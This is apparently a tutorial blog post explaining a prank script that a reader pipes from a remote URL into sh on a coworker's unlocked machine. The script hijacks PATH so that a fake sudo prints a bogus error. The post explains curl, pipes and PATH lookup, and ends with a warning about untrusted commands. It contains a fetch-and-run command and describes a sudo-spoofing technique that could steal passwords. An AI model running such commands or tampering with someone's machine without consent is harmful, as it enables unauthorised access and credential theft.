Evil Sudo
This article assumes basic knowledge of the command-line. It also assumes you are on Linux or Mac.
There is also a video to accompany this blog post if you prefer.
youtube: RrgxRXZf0vI
Want to infuriate a coworker?
- Wait until they leave their computer unlocked.
- Open a terminal and run this command:
curl files.tomontheinternet.com/evil-sudo.sh | sh
- Close the terminal.
Now, whenever they try to use sudo, they’ll see this:
10d20d7815 EXCEPTION unknown (0313)
Googling won’t help them, because that error is utter nonsense.
How does this work?
To understand what’s happening, you need to understand the following things:
- What
curl
is. - How you can pipe text to a shell.
- What
evil-sudo.sh
does, and how the shell (command-line) determines which programs to run.
What’s curl?
Curl takes a URL, makes an HTTP request, and returns the response right in the terminal. Curl can do a lot more than that, but for us, this is enough.
Type curl https://www.google.com
into your terminal. You should now see a wall of text. That text is the HTML of Google’s landing page.
Now type curl files.tomontheinternet.com/evil-sudo.sh
. I promise nothing bad will happen. What you see now is a shell script I wrote and hosted online. Curl went out and got it for you.
Sending text to a shell.
The pipe command looks like a pipe: |
. It takes the output of one command and sends it to another command.
Type sh
into your terminal. You are now in an sh
shell. It’s a lot like a Bash or Z shell. You can play around in this shell if you want. Then type exit
to get back to your normal shell.
Type echo "echo hi" | sh
into your terminal. This will send the text “echo hi” to the sh
shell to be run. sh
will run the command return the value, which is “hi”.
So, looking at the command from the start of this blog post, can you see what curl files.tomontheinternet.com/evil-sudo.sh | sh
does?
It takes the result of curl files.tomontheinternet.com/evil-sudo.sh
, which is a shell script, and sends it to sh
. sh
then runs the shell script.
So, running curl files.tomontheinternet.com/evil-sudo.sh | sh
downloads a shell script called evil-sudo.sh
and runs it on your computer as you.
What does evil-sudo.sh
do?
Here’s what evil-sudo.sh
DOESN’T do: it doesn’t modify your sudo
command. It can’t do that, because it doesn’t have root access.
Unix-based systems have a $PATH
variable. To see yours, type echo $PATH
. This variable tells your shell where to find programs. Your shell looks, in order, through these directories to see if a program exists. When it finds a program, it runs it.
evil-sudo.sh
adds a directory to your $PATH and then creates a fake sudo program in that directory. It does this by determining what shell you are using, and adding a line to your rc
file. So far, it only supports bash
and zsh
, but that covers 95% of all users. Now, when you run the sudo
command, your shell finds the fake sudo program first and uses the fake sudo instead of the real sudo.
Don’t worry though! evil-sudo.sh
is harmless.
This could be much worse
evil-sudo.sh
is annoying, but it could be much worse. It could pretend to be the real sudo command, and steal your password. Once it has your password, it could delete all files on your computer. Scary.
Make sure you only run commands you trust!
Learn more
The source code and a command to remove evil-sudo.sh
are available here.